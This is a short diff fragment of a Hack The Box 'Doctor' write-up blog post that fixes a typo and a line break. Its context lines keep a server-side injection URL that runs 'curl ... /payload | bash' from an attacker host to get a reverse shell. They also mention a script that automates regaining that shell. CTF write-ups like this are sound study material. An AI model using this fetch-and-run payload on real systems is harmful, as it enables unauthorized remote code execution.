davi-cruz/davi-cruz.github.io/_i18n/en-US/_posts/2021-02-06-htb-doctor.md

   http://doctors.htb/archive?input=curl%20-L%20http://10.10.10.10/payload%20|%20bash
   ```

-- And voilá!
+- And voilà!
 A reverse shell was returned :smiley:

 ![image-20210117191626475](https://i.imgur.com/TyHFL9D.png){: .align-center}

-**Bonus** To make it easier regain initial foothold, once user account has a short validity of 20 minutes, I've created this python3 script to help on this task :smiley:.​ To use it just set up the listener and python web server, then the script will recreate the user, the message and then make the request to get the reverse shell again
+**Bonus** To make it easier regain initial foothold, once user account has a short validity of 20 minutes, I've created this python3 script to help on this task :smiley:.
+To use it just set up the listener and python web server, then the script will recreate the user, the message and then make the request to get the reverse shell again
 {: .notice--info}

 ```python